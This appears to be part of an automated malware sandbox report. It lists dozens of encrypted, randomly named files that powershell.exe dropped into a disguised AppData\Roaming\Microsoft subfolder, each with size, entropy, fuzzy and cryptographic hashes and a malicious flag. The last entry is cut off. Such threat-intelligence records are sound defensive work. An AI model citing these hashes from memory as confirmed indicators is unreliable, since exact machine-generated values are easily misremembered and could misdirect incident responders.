                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:3ejYkQLw33j8EZ4WgL5+Da/v2ffa9m7sJti:3G8yZ4Qe/v2n0m7sHi
                                                                                            MD5:5879B85CFD661E01A386691569E40DCD
                                                                                            SHA1:4B7879FC285A02E5C99CEC1D5FC4DBB4E2B1537C
                                                                                            SHA-256:B8F04FE629A206F03B1B9C47086371A6EB44E8374473650EBC8A81363804D0A4
                                                                                            SHA-512:80EE9B40FD20A71065467FA51681CBAFF1048D3D7E80CFFC6D134D9C6BA48327BFDE75F46257E2BCE66989CFB6E362AE401532AC1C004CCCD88EE31606AAA43E
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\cPmAHLlBJEfYonRFqTd.mbFdJIQypO
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):176427
                                                                                            Entropy (8bit):7.998960272659409
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:iQOMWorHimp55VOgSEO6AuQd6USuAXYQlgZu+WdpByLZYGpSr:NwwHzOvuQwEAXFdjyL+Pr
                                                                                            MD5:C6A7BB37E82D9BA330FF571407EC26FB
                                                                                            SHA1:C5594416BAC79FF6D6A2105F64C71A8E23974043
                                                                                            SHA-256:03D999655FA4CC1FBCE2889C6CB89B30765C5AB72723D8BE9585D2971739AC2B
                                                                                            SHA-512:399CD8A55337FB44F560C7639F133E3549F7EFA0AD0A671988E55D2DAE6E5DA531F5FA505D4B516DE63925EED66F4E8F932E5EAF5D3562207B3701F83EC67FE2
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\cbwhGoKafEsNdO.hkbPgXmfDFuzyoR
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):92506
                                                                                            Entropy (8bit):7.99822357567078
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:qQCDTBaX1pm74bmIWsDmo5jSJiNVE8smvm6WPeu9kVKQ414KF4eZ3ZSU:qNnBaX19yqZjSJX8sGOPeFVi14KF4MX
                                                                                            MD5:B462C46CC181EB6A2F7653106F2E2C0D
                                                                                            SHA1:2349B594B366C382BA299B9BF520EA81FF955C33
                                                                                            SHA-256:6953519748AEE4AE3AE26B6F252462D561755803CE36594C906ED8CF779CDB75
                                                                                            SHA-512:B28141295A42E48B3143AD486BABA59F4B5A7155AAA8FC28F0EBA4AF6D07E576E9C1F15A03D9288705381952032C4DA06AA801F379C72C537451956C80091CD3
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\dbhYTxgcwOknlfLPy.dXWZOzuyEncBiKgphl
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):157693
                                                                                            Entropy (8bit):7.998859298873824
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:AIsWjF/bh4zeY18Lf62LfYyOBjhTRxHy4kKswhWE/XVHTAud5Zz3T:TFF/VeeQ8LfrLbMjZ3SusEXdTDZz3T
                                                                                            MD5:7FC45F02CB69A61168257C0BEC1A7FF9
                                                                                            SHA1:92B99BEDA8D047B38ACD003F7E8266453A2C10A1
                                                                                            SHA-256:8C6C42BDE05D6D3ADD4BAB54C498A9988A1317C51D00C7FBC83AD25F268CDDF4
                                                                                            SHA-512:9A08400EC99C3EF6C522A35E843D97ABC8B2BA2DF7B80F5FE044334315917FDCF9F020420379369D01D448AEA10A09C85B40481D2C65FC0B8BA609305FF28BE7
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\ftehrgjdHTqRZ.cdQmyTfGIkCYzh
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):97622
                                                                                            Entropy (8bit):7.998299352240902
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:wdC4kP2SxZNqADIzc1JC1ApiWCi7LoSJQ1ZuR7OU+xtt0NZeRJ//VxucwOQZB:kC4kFvBzCiv5HO5t0NZEVMlZZB
                                                                                            MD5:2BC9D4F084699EE3B064621A7CB052CC
                                                                                            SHA1:848AA9F7898BEA76E03AF7542D3170351452C6E5
                                                                                            SHA-256:1207BDABF55B4C3F6DF4D917CA3B39E2A4BF68CD8AC20D19067152DEB300E443
                                                                                            SHA-512:6B63B833B3710659C38ED47539107FA483A739709E1884A63DA898FD2EEB4E3BA3D8919FBDD1164F0BB116CF8A5C63B1085D6F1181D5229422E7020F50D23A59
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gEGPTCzXcJpLbsW.aGOncoiTpkShXyWN
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):56447
                                                                                            Entropy (8bit):7.996763641809161
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:8bKLmXb23tP2R5JYtMncTRYBOeqwIh9UaSYIrYoIeONod5Mro600ioSQeJLK0kMP:jqXQtP2TnrBmRUuoIeazrf0R79GSuW
                                                                                            MD5:8E34DC88143FD46A78429538BC8E558F
                                                                                            SHA1:72297C49F1DD0290E081DBD14B8023BFEBCC82B4
                                                                                            SHA-256:78C0886F109D432DFE6391CD6124062E0384A8DA280C7CF3FC9CC87D3D22E9E6
                                                                                            SHA-512:E97380E674F86F9CBF1B80CA99AD3CC17659457947828238FB4AFF2685BB1B6E6E56AD075CE6D2F8D149A86019E538C32A41CA384A9171FAC690D44ADA23C0DD
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gPuVCxOZRGK.ClFrGdavymeOAWxn
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):58868
                                                                                            Entropy (8bit):7.996992474061312
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:1cZArw4AO8og4/g920yr3rzQNGI0MXnlImPifmifMJrPr3:WArwa8otyyjrzQYQXnlImPtKMxz3
                                                                                            MD5:CF76CEBFE6D1BA7F05B518E0F3607F20
                                                                                            SHA1:F108D1814AAD75B9677FE6EE989AC56FBBF1CF9C
                                                                                            SHA-256:239D3570BD111477118BEB5333CEE8DF02B56E4A692321BE076D44176052AE8C
                                                                                            SHA-512:98575CD039DD86309A8BBEF0D8E98927BA106A3E9C80DFCE46EB32C0409F1E1B373CB4A0216930576CD0114F3026B59F9EEA0F906E705484086AAB19F59E2907
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gvXqMJDhSkw.kZCiLuxnrPHTsJM
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):188038
                                                                                            Entropy (8bit):7.998846542579685
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:FtOrhZxrzMT9M2NRRJwc57fCDkfoSC1J6HlkogxF73XRrx56In:fOrJrzMTbn57KD2ox1J6Hlb0LRNzn
                                                                                            MD5:5ACA4DC46FFAF9E9C88F04FC1FBD98FC
                                                                                            SHA1:B1A56E7084C099C4A8CC68C0476D59BC776BA246
                                                                                            SHA-256:0C909E262711F057BB7AACCC4757032D7FED0875EA12FDEC0745E947C6778620
                                                                                            SHA-512:B70242BA5AED75AD819411ECB165BFE6F0A3A80DD1540443A7C3C5DFA5F8E163A8FBE7B1F13281AEB8E66E249D6CB654B04935ED4FF8551156B5C93DCA47A885
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gzTuApnUWZRGdXFSYr.LCFTiNwmPDcq
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Dyalog APL version 97.39
                                                                                            Category:dropped
                                                                                            Size (bytes):184414
                                                                                            Entropy (8bit):7.999008241877673
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:G/Gv1LQunCUUcmO8ihnGMG3jH55mBBNtGcONSCQaHvFc54irhYw8nA:GONLQunCjc18F3jH5ODGmUHvu5fYw6A
                                                                                            MD5:CF17064F0A92FDBB8E4532FD4FC3BC38
                                                                                            SHA1:4A2FDE48DC2CE9A291DD4237CB8744302EEF2B15
                                                                                            SHA-256:6B5DAF97155DFFFB05E1F408D59D3FE4ABC894232D7974806CCEC5F119F96899
                                                                                            SHA-512:E8FF1463F010164F788557636A9C58E785E9444F3914DAD97D2A6E96C3508546D4A31AE1D1171F6B3DF1758F735FE8415960240ADEF7A1ACB1C6745AEFC7797A
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\hHgsQfEaVJSxXibp.mQlHnMaSPoKN
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):144687
                                                                                            Entropy (8bit):7.998692940576115
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:EtWRZQg74i3isPdxOZWAhCj7Flp962T5dUqf6b/oyZjgR09JY:8KqgriaiWAwvFlp99OqSAmjY092
                                                                                            MD5:A4D3099BB642672C6274B5EBA0989967
                                                                                            SHA1:E58BB81E296651228962917B8150D8F9D340848C
                                                                                            SHA-256:05E13D8D3C9BD8A2F1C9DA49527A56CFBEE8A15A019ADF99CBA68D26C14314E8
                                                                                            SHA-512:5FD27CD55592B095FDAB64A20EC866D3D5B6BDC8626C879845654948785B8BEAA1C8A5189A42801E38B97894450567CFC7FCE74F7EC7FA9227B38DAE3523D94E
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\hTUVAtmiEMuF.YbrcRuktOoLFJP
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):114052
                                                                                            Entropy (8bit):7.9982360868084
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:Of1vQTfpQoeOB61EsIU68A+ODBjvhx148/i7W07n:yaTfpQoCEwA+4B/b8r
                                                                                            MD5:2B2AC2F354B1032DE598BAFEF93B5883
                                                                                            SHA1:DE5332CCD99CA09122295237F427A64E9A26ACED
                                                                                            SHA-256:CAAAE929042197FFD883B8C10BD6EB48F1233294B113A524CA23F35B0ED4326A
                                                                                            SHA-512:1AA17324D01BC409BA14422677529A2D20788E4E4EB154DC3E415AFC913CEEA18B9203EFB95A49E58FCD6E590553AE040A1EFC688C94587733956BB3D88F2F27
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\iHJKhyYvFeCVZk.uXIYCDmqFBMdlQiwv
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):80516
                                                                                            Entropy (8bit):7.9976937994515875
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:vSru5lvGTFhcYAuUzqxOLhenHjrukt1QMQCgXmU/A:vHT0jmzqxgYWY1QMQ/XmU/A
                                                                                            MD5:808824D0E937924D614D3FF07A262C14
                                                                                            SHA1:4165D2973CDC60D375602F370E097F5C47B71DFC
                                                                                            SHA-256:AFB9354FF7D93D1015FA3F16C228A51064C6B437D50B63B964C27B0915AD60D6
                                                                                            SHA-512:6CD45DD8BBBB0E791DDA49D2D9AFB07319CB8617DDB5966C02178F9633389AE6CF27FD09E1C297DA8C25E568C437749613A7D9B037696101B6445A3E94795C10
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\iVXufIvLOZxz.WslqdKgXMEPjmJUr
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):105858
                                                                                            Entropy (8bit):7.99820308976809
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:0Pc0KTS0pGhdt2V+fqvE9VzbcIqxr8mnYvSO2rDvZkEZ7SZ/7MJZizAhuy4x+Va5:0E0Ke0YzvZzCp8m/fyEpSZ/vAkma5C8
                                                                                            MD5:1E1A94B4DA5546A22A680FBB677FA3AA
                                                                                            SHA1:3445BF056B491CF3137ECD23D00C5733A26D84D7
                                                                                            SHA-256:DD1FF553672CDC53D2AC500618729E091B957024DF4A0F3EF280558204715B18
                                                                                            SHA-512:FAE62B3204F1208593ADD56186E9AAB7B21B3C1D753AF835CF0C6E16085B4A2D7A66C4E49FF29C89B7491486F911413C6A3550EF0C7AADB8F12857DDFBC394FD
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\jHcXtlGToOPIg.RlFEhukcNHqfrC
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):63240
                                                                                            Entropy (8bit):7.996610576038057
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:9g87Q2ffjUZ5Kkyr0mFpcPmgRdsEyPGRrQqI8PYF0BLL:9Xcijo9yr0CsRUPh8PYFkL
                                                                                            MD5:F4B9E0110BC239C485B9C8163E5C38F2
                                                                                            SHA1:B518A64B0ED2A0650FBD19BDD795DE77921FB786
                                                                                            SHA-256:FB156C1E01C3C511C06E60551B2BFDB4E04A97F4EB67B147B3D1DD1334F0991A
                                                                                            SHA-512:9078F39FB739AEF55DE10D597DCF00E5845FC0D01FF52978C5EF5482E02818BD84353039CB27713E309B352AFA6D7BDB1AFE5B5C010D85870383D393D44B64C6
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\kKAvInrXuSO.zTWZlgovnHhuI
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):130942
                                                                                            Entropy (8bit):7.998566178400659
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:L1ppHZaU3B/ZM0UXjRQh2d88mkDlAZB0ZHr4Fc7Q0P6ZiPC:Jpp593Ba3XtK2d9mkDl60pic7Q0P6Zi6
                                                                                            MD5:CEEFC4914B1AB0AD1BD9B27A3EE498D7
                                                                                            SHA1:1291271323354CF39BE94DD0760BDE5FADAFEC30
                                                                                            SHA-256:4D6AF44F26FE97387801EA1845AFAFA2F99D2850CEDBBDEC7943688AA3D5AB85
                                                                                            SHA-512:2AA3F5D90E8421982F6D6CC7B5FF095F92BD52E7E2CB4A1C4D39574EBAFB2BD02EC9A65723583E5A7AA33C18AA7E994CFB2FC3008D14DF9AC7D1B277AA4674C3
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\klgNQBPouRDhqUv.vwojHfsturgXbnd
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):187417
                                                                                            Entropy (8bit):7.998967451139334
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:scHn0zbif8Zu91MsfB7GpdQxmgj/sgzvXnzueAEiuJJh9/+b5NlyFmsu69XY3pXp:8Cf81s6Gm52KXEDp9/fFpaL
                                                                                            MD5:96B859B2ACF766433C2076ACA857A094
                                                                                            SHA1:209DBF34B4AA6388F73BD86C85B6E3FE68D955CD
                                                                                            SHA-256:97FFE6D4BF5634FF3CA198DA5F5AB0F40C108CFEC887C18633646FD6D8703E84
                                                                                            SHA-512:AE5145346033648CB1F9446BF5E256AD0754B36542B8F67C45295DFC6AD6357E9C453DF317FFCA31C60F6DA95880C2FBE3A607FD56CEF5FE7B859A207D13F0C5
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lGMphzrcTveNIbnSDuB.lXxNBiIAcT
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):107809
                                                                                            Entropy (8bit):7.998127397020591
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:KgOSpMFYbAICuCKbYwnPcMEf06qaoHbtwJb41VQWuEczQQE7s4/9Z2BXfeEnz:0JFYbAWLYw0MEJo7tvbuzEz7rjoXmEz
                                                                                            MD5:2C04D82C7AFF6C9CD1B1D0E16FCB5927
                                                                                            SHA1:830AA3549FF19E089EA7DF3FF790993803191409
                                                                                            SHA-256:F82B735DE273B95CD61982FA7CF85E4DC1BC28194C4F5C2AFA2FAEEAB8A77321
                                                                                            SHA-512:4BE373BF6DE102F2E47EB5E08CBD84AB867616F4F7A1ECDE17BE75EE7ADD75DCD79B875F617F8EB8596170DCABBE09588EA3412B74541697519C5394812C27A6
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lKRdxuzNOmjsMkStLW.UwzXkbdQLrAWHEhv
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):128259
                                                                                            Entropy (8bit):7.998479326526466
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:mhmKJPGMXfNhGH80yYtGOHEmKiHhHiiJXf5YkVvZfrN+gr4gWJCuU4HUiMZs4zAJ:mIMLbzYt7kOhCYflxddl4wO/Sxq5jdtr
                                                                                            MD5:C6B46B28D89DD335FCCB8182D7194042
                                                                                            SHA1:EF80892A44CE01D91DCFA5314C240C1DAF6836C7
                                                                                            SHA-256:65A3DBBACE53CA36A218F39A070190F263314B98CB74137A67E7816A7FE174C5
                                                                                            SHA-512:F49A2364098EE95EFD7F58076DBA8371D283FAAA8C9F575047683588EA137F9B6D7E39A3317F11E094A94B80279C7DBFF57E406A679CB4C024F6623C1804C590
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\liFAaWLePtdOXCRGpuQ.tSMqFINOpJZVrnmQ
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64349
                                                                                            Entropy (8bit):7.996895365099058
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:moa1sGJtuCqNiM1UZMARB7GunEZno3zH5L3lsl/:mNmNiMc3+Jto75LOl/
                                                                                            MD5:D9C27531B5336491C47C4722EDEE31B2
                                                                                            SHA1:4A27BAF3E7289B2FEF8512D52156BA6A30AC1A58
                                                                                            SHA-256:B6BA6904FCBB85D50FADF0359CB70DBA39C3EBA35080653E9F5D35AF9F79AD13
                                                                                            SHA-512:351DADF2E9BFBD4C055DAFC1196DF69812CB47D2F103BB3192F8C5565A65F6AB7611618981F770C3E63AD2BE02340302C5E4AD6D79E3A9702D7F611FFF5BCD9B
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lpvtEnzFmSrBxs.bvthIxBqKRcrP
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):92827
                                                                                            Entropy (8bit):7.998071560610671
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:FOBOv2yKOORrHX2FXsvOlQjbpXAZY/4ixEuosllyA9YihnkFl74zMhCPj:FOIvDypvOlewqMcf1gZ4AhIj
                                                                                            MD5:5C5ED14E7ADCCB743F598987D65FE36A
                                                                                            SHA1:09769F6ED7AEFA8CB50D2B82F1C72FCBEBCB5AA7
                                                                                            SHA-256:C50741EAA758B4EA4071101A68FF6AE1829AAC73BAD37695041334D778F518DA
                                                                                            SHA-512:80CD731B626F135A6FEB9E7986DB5D99BE42462296B706AA2040BC1413C90826B5AADE7B3DFA9A59E6F02CEC9B7DF97956C6A267C7C799BD53F376E61A68854D
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lzQLsCuXKpNJRnD.EYoPxpsTGlaKum
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):66656
                                                                                            Entropy (8bit):7.996903688332996
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:unx6maaILof79w/4oTz9lmpIHLtHGfecXi4vM7Zp4fbiYgFB:uxjBxw/4S94pIZHfYvupd
                                                                                            MD5:9746FE63D54C87CDCCE696CAACF9F101
                                                                                            SHA1:642B32EE62C9FBF7DEC244F238565314C7C63566
                                                                                            SHA-256:1E91D537EDE4BF5E53A8BDCE50C7CB632F916070C0D79C3CFAFD52CB6B688996
                                                                                            SHA-512:4AA7758B9E5C9334107EB8AFD77F9E9E317F3A9057D6EB58C7CFC5B015C6456E18F99308EA7DA3BD756F8460B117E27024691122B4097AE40C00C45CDFE88E23
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\mAaRvDrSculntQg.MCLcbUpOkDw
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):180258
                                                                                            Entropy (8bit):7.9988047315485495
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:cm5E35QBrLkaa97vy1YO9p+Vwm/W1IrxZEHgC4C9W/u0isu6xdVKOWYq:D0paZ9p+/9DJBiPDOq
                                                                                            MD5:E1BCC10E798898D3EE2AF6C881311C80
                                                                                            SHA1:5A8DAEE9CF2DF8ACF4C64FBE85D5C69A1810D375
                                                                                            SHA-256:B1E56C73643CF8B9BDDC329AA1ACA99C2C14C0E01E6CD2B144C944D59C243F0F
                                                                                            SHA-512:FFFB56AB729A93F6AD7BDB27A646F93BFDC46DF8325F14F808B32D3D08B0188895E7FA512C46ED348EB8188767FF6BFCF319A05B7330EBBEE2BA70EC92033E5C
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\mYSrPVTEqWZeX.EgMFikpUrCjD
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186945
                                                                                            Entropy (8bit):7.998906025687325
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:njrlgjeFKQZKjVlGxi2Xv+blqymX/H9MLB/ZW8kiG4sLS+a7cE6nDbFf+isrFcI:jraytZK5oM2XOqnPHM/ZRLOCriWisH
                                                                                            MD5:FC1A651B72FBF6044C6C67184510FCB2
                                                                                            SHA1:22780E828B80E108B8F84118D613ED12693A029F
                                                                                            SHA-256:C8FDFC3F74C420503501A9E1F1BE5E8194885E653C652073E047293263B8AFB6
                                                                                            SHA-512:3CF7C40B0D90C6C35E497DB66709F03924B0B2E79C8FE5A208FA93ABB474107F5B530CC63A81EBFFE03822B4A04D032679BF4D912CD092646A0C787B421C43E7
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\nthwmpDXQUGoBH.RvHaDZmNlAocXVgTxL
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):122518
                                                                                            Entropy (8bit):7.9984639844118
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:im4lnVFgxLqRjZul8n2/yT8Fbt09q7jMcI:im4bbAlb9F+9GY
                                                                                            MD5:76A5202385CF0D78078669467FEDB52C
                                                                                            SHA1:7B67821EC5D85A7A9B17F2E592BEF120E2D04A2C
                                                                                            SHA-256:049C356C4AD6882D7844E3D844FE1EC7D01F641462E8BBCA7C21DA9CF909A742
                                                                                            SHA-512:BEE943A8D26F0AC122EAB357E8D85E69C858E1CF07F36314FA5D5592B0539BD6680E15E5A0A98462601FA8AEE2C5032E3698B43773852FB7102DB7D337A34F8E
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\okefTKFcPy.FKBGwpZmnRYoSeJz
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):87533
                                                                                            Entropy (8bit):7.998058025191271
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:waYtFlF8N76Y/FPV4YTJCbQTXR5BkuUfWIZKB/6ul9Ey/:wjtFGR/JFU6qFfVZKR6+u4
                                                                                            MD5:5B389E1EEB35067ED1997DD8C0A8192A
                                                                                            SHA1:D16F49D820FD75D6DDE0FD8734E74869CFFD5212
                                                                                            SHA-256:C6D97FC753C333F779D76429B44470810AD0BD909F70F0DECC95CDBCDAD36DEC
                                                                                            SHA-512:76C18EEC2CD6C2EC880AFFC87C9BD8EBD88DD3555883A7189465075FA9C61CDFBE603825B822ACFA1DDBD0DA75CC1410D81688E8EDF64318AB6AAE4279502EC7
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\pWNJaOkLEPTitoZQxh.dhekgZDquCEOGo
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):63632
                                                                                            Entropy (8bit):7.996914160272356
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:cusrXUNObQ8K18B6IDZcB4yOxpnaN2E9PM:cvzUNe9X6IDZcB49a8EVM
                                                                                            MD5:FD3DEB96DFC944584880EA7C71287D51
                                                                                            SHA1:CBDA1E0E2B60967183AF5331575F88FC0460C3E0
                                                                                            SHA-256:20729B3FEAC24894C2B500DC0D1306E876E75957CB852DA811E8D6C0358ECF50
                                                                                            SHA-512:0F4D2DE68032E3AECCD6505991B048195BDE34DF32FCF4F3189624CF76A1BD2A812A04DC6F3AD3428148507E845078EE63FF210B9D9B14BEAF362B223588C0E3
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\pWvkATwEHSh.AqsJwQazvZIXiBC
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):67800
                                                                                            Entropy (8bit):7.996465274236661
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:GOL6lx8RxW5mrJ8O2774N8zcNTo970N7o/15pTB:jL6oOG2c8uNsdR
                                                                                            MD5:2A453F609C83DA23DB9538CC46244912
                                                                                            SHA1:1C381D330DEE719925B8210DD75199BAA4A3AC14
                                                                                            SHA-256:3F8AE3481C7A8FF0A4D68A5A181BA2343ED5AB74B7B85AB9CB475BBD3D84D074
                                                                                            SHA-512:D6570D0B2E344110F5AA30648C7E207C4FC3C1EE8BB4C627E2E17F0E32E1639C2AC657533A919AED7CB1E7E127A3F55AF33ADA57072F29B5A4E7E53C46DE9944
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\pXLuVbZASaMlEkmB.HvyDrojqUXiw
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):151836
                                                                                            Entropy (8bit):7.9987254853445275
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:a7nmACH9ncdkKseaaP29XJ8mPNvxYSyE9w2YmZJ1dgimetiIE7QxF/:a7nmH2kKraS2wmP5x5C2Ym/1mh/Yp
                                                                                            MD5:AB8AEEFC7D8A15CBAF3918ACA135245A
                                                                                            SHA1:CA2D0E80557421E3636602131CD4890DB51BEBD8
                                                                                            SHA-256:2B8AEE439B50188E555F26EDEA13394DBD51B7C80FDFFB9437D7EA2C755CBA36
                                                                                            SHA-512:DA52131DA0ADE5F7D4100D53019571645F9A13D136C8EA9A5173AFD6D692DEE5EE5AC40A48C294299D9CB78AF34162F087AF9FA47515D46461623A53D9EBC692
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\phavEfQLqZxUOAcgMu.cBsHAFSbqxwgkUGOuYo
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):177229
                                                                                            Entropy (8bit):7.998914513642588
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:kCTZOLSrNWpZFLbvDN+4iV7yWfOKIkPnJbn33UQO29KYD03Rlm:Jw0I3BDB+NlG10nJbnUQncYgB4
                                                                                            MD5:F2A74DD0E19F719EC57AC16265D7472A
                                                                                            SHA1:88453B72A8F25A32597172B9DDAC1EA19BFC29AE
                                                                                            SHA-256:60EFF54D252F7B96F8A7AEE7725478C8CEEED76379DE392D2294B5A333BF2CE6
